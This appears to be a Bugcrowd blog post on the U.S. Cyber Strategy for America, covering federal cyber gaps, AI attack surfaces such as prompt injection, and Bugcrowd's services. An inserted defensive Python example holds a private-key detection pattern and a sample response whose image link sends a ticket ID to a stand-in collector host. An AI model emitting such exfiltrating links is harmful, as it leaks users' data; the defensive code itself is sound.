The U.S. government faces a widening cybersecurity gap as AI accelerates the pace of attacks — and the Trump administration’s new Cyber Strategy for America charts an ambitious path forward. Here’s what you need to know:
Security has always been about prioritizing risk; no matter how well-resourced, no team can identify and fix all vulnerabilities. With the rise of powerful new models like Anthropic’s limited-release Claude Mythos, the window between discovery and exploitation is narrowing. Recent research suggests that the consequences of AI might be even heavier than imagined—even cheap, open-weight models can give attackers an edge.
For governments, this introduces a prioritization challenge. Their systems are high-value targets for attackers and nation-state-sponsored threat actors; any compromise carries national security implications. However, they also operate with far fewer resources than their private-sector counterparts, making them more exposed to these threats. The Trump administration recognizes these challenges and, in March 2026, released the Cyber Strategy for America to push the government toward preemptive security.
In this post, we’ll take a closer look at this strategy and the challenges that stand in the way of its execution.
The Cyber Strategy for America outlines six pillars for strengthening America’s cybersecurity posture:
Executing on these pillars requires agencies to simultaneously close existing gaps while adopting and deploying new AI technologies—a process that necessitates solving several compounding problems at once.
Federal agencies often rely exclusively on decades-old systems, which pose significant vulnerability risks. Nearly half of known exploited vulnerabilities are tied to outdated, unsupported software that doesn’t receive regular security updates. Modernization is underway at many agencies, but progress is slow: procurement cycles are long, and the talent needed to execute them is scarce. In a recent survey, 44% of agency leaders said that gaps in skilled labor were a key barrier to making progress in their department’s modernization efforts.
The result is a pace mismatch: agencies measure modernization progress in years, whereas threat actors move much more quickly. As a result, agencies running legacy infrastructure are disproportionately exposed.
As agencies adopt AI tools and deploy AI systems, they’re also introducing a new attack surface that needs to be secured. In modern AI systems, the foundational model is just one part of the equation—it’s usually integrated into a broader system that includes tools, memory, retrieval, and external APIs. Every one of those connections is a potential vector: prompts can be injected, tool calls can be manipulated, training data can be poisoned, and memory can be exploited to compromise or manipulate a system. Additionally, if these systems are built on third-party models or infrastructure, this introduces attack surfaces that agencies don’t have full visibility or control over.
To protect against this threat, agencies need to defend all parts of their AI stack using guardrail models, structured tool schemas, output verifiers, and other defensive mechanisms. Implementing this approach requires a mix of human talent and other specialized AI tools. Given the resource shortages, lack of technical expertise, lengthy procurement cycles, and competing requirements, many agencies don’t have the bandwidth to properly secure these systems. For risk-averse agencies, this can slow adoption, whereas for others, this can introduce security loopholes that threat actors can exploit.
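The structured tool schema and output verifier defenses named above, shown as an added example that is not part of the original post or of any vendor's product. The tool names, the `kb.agency.example` link host and the sample calls are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Hypothetical tool registry: exact argument names, each with a full-match pattern.
TOOL_SCHEMAS = {
    "lookup_ticket": {"ticket_id": re.compile(r"TKT-[0-9]{1,8}")},
    "search_kb": {"query": re.compile(r"[A-Za-z0-9 .?-]{1,200}")},
}
ALLOWED_LINK_HOSTS = {"kb.agency.example"}  # assumed approved link host
URL_RE = re.compile(r"https?://[^\s)\"'>]+")
SECRET_RE = re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")

def validate_tool_call(call):
    """Structured tool schema: accept only known tools with exactly the declared arguments."""
    if not isinstance(call, dict) or not isinstance(call.get("tool"), str):
        return False, "malformed call"
    schema = TOOL_SCHEMAS.get(call["tool"])
    if schema is None:
        return False, "unknown tool"
    args = call.get("args")
    if not isinstance(args, dict) or set(args) != set(schema):
        return False, "unexpected or missing argument"
    for name, pattern in schema.items():
        if not isinstance(args[name], str) or not pattern.fullmatch(args[name]):
            return False, f"argument {name} fails schema"
    return True, "ok"

def verify_output(text):
    """Output verifier: block key material and links to hosts outside the allowlist."""
    if SECRET_RE.search(text):
        return False, "key material in output"
    for url in URL_RE.findall(text):
        try:
            host = urlsplit(url).hostname
        except ValueError:
            host = None
        if host not in ALLOWED_LINK_HOSTS:
            return False, "link to unapproved host"
    return True, "ok"

# Constructed samples: model-proposed tool calls and one model response.
SAMPLE_CALLS = [
    {"tool": "lookup_ticket", "args": {"ticket_id": "TKT-1042"}},
    {"tool": "lookup_ticket", "args": {"ticket_id": "TKT-1042", "export_to": "x"}},
    {"tool": "send_email", "args": {"to": "someone@outside.example"}},
]
SAMPLE_OUTPUT = "See ![status](https://collector.example/p?d=TKT-1042) for details."

if __name__ == "__main__":
    print([validate_tool_call(c)[1] for c in SAMPLE_CALLS], verify_output(SAMPLE_OUTPUT))
```

Both checks fail closed: a call or response that does not match the declared shape is rejected rather than repaired, so the rejection reason can be logged for review.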
Federal agencies have access to a treasure trove of data but lack the right systems and governance to fully leverage it and deploy effective AI systems.
AI systems are only as good as the data they’re trained on, and many agencies can’t confirm the accuracy, consistency, or completeness of their data. Flawed inputs produce unreliable outputs, which compromise any AI-powered defense tool before it’s even deployed.
Additionally, even if the data is high quality, it’s spread across different environments (e.g., on-premises, cloud, and hybrid). Effective threat detection increasingly requires correlating signals across agencies, but these siloed systems make it difficult to assemble a complete picture. Ongoing resource shortages and budget constraints exacerbate these limitations. A recent report found that federal agencies are struggling to deliver high-quality datasets due to limited resources and consistency challenges.
Federal procurement and regulatory frameworks were designed for stability, not the rapid pace of AI deployment. For instance, the Federal Acquisition Regulation (FAR), which governs how agencies procure new software tools and other goods and services, features extensive rules that can slow the adoption of new tools. This further hinders agencies’ ability to iterate on their AI stack.
Even when agencies have access to the right tools, ensuring those tools are actually used requires leadership buy-in and trained talent, which many agencies (especially small ones) lack. According to Brookings, only a small fraction of technical talent in the federal workforce has relevant AI skills, and few current job listings mention AI skills as a key requirement. When agencies lack the internal expertise to evaluate and confidently deploy new technology, the default is to move slowly, causing them to fall further behind. Ultimately, this leaves them open to exploitation by threat actors.
As the pace of exploitation increases, the Cyber Strategy for America provides a blueprint for securing the public sector. However, executing on this vision requires agencies to act now—mobilizing the right tools, talent, and processes—before the window narrows further.
That’s where Bugcrowd comes in. With our recent FedRAMP Moderate Authorization, federal agencies can now engage Bugcrowd’s offensive security testing platform to continuously identify and proactively remediate their most critical vulnerabilities without long procurement delays. In part 2 of this blog series, we’ll dive into how the Bugcrowd Platform works in practice for federal agencies and the public sector as a whole. In the meantime, you can learn more about Bugcrowd’s government solutions in this brief.